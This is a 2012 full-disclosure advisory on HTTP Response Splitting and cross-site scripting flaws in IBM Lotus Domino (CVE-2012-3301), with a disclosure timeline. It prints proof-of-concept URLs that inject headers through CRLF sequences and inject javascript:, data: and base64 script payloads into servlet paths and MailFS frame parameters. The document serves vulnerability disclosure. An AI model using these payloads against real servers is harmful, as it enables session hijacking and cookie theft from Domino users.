Date: Fri, 7 Sep 2012 03:54:27 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>
Subject: HTTP Response Splitting and XSS vulnerabilities
	in IBM Lotus Domino

Hello list!

I want to warn you about HTTP Response Splitting and Cross-Site Scripting vulnerabilities in IBM Lotus Domino. At 15th of August IBM released the advisory concerning these Cross-Site Scripting vulnerabilities.

CVE ID: CVE-2012-3301.

-------------------------
Affected products:
-------------------------

Vulnerable are IBM Lotus Domino 8.5.3 and previous versions. These vulnerabilities will be fixed in Domino 8.5.4 and IBM are still working on other vulnerabilities, about which I've informed them.

For fixes, workarounds and mitigations reference to IBM Security Bulletin:

----------
Details:
----------

HTTP Response Splitting (WASC-25):

http://site/servlet/%0AHeader:value%0A1

Cross-Site Scripting (WASC-08):

Will work in different browsers (in case of Mozilla Firefox will work in versions before Firefox 3.0.9):

http://site/servlet/%0ARefresh:0;URL=javascript:with(document)alert(cookie)%0A1

Will work in all versions of Firefox, but without access to cookies:

http://site/servlet/%0ARefresh:0;URL=data:html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B%0A1

Also there can be used Location header for XSS attack (for which there are its own nuances of work in different browsers).

Cross-Site Scripting (WASC-08):

The attack is possible via data: and vbscript: URI.

http://site/mail/x.nsf/MailFS?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

http://site/mail/x.nsf/WebInteriorMailFS?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

In x.nsf, "x" means username of logged in user.

------------
Timeline:
------------

Full timeline read in the first advisory (http://securityvulns.ru/docs28474.html).

- During 16.05-20.05 I've wrote announcements about multiple vulnerabilities in IBM software at my site.
- During 16.05-20.05 I've wrote five advisories via contact form at IBM site.
- At 31.05 I've resend five advisories to IBM PSIRT, which they received and said they would send them to the developers (of Lotus products).
- At 15.08 IBM released their advisory (about Cross-Site Scripting and HTTP Response Splitting holes - just few from total amount of holes).
- At 28.08.2012 I've disclosed these vulnerabilities (second advisory) at my site (http://websecurity.com.ua/5839/).

Best wishes & regards,
Eugene Dokukin aka MustLive
Administrator of Websecurity web site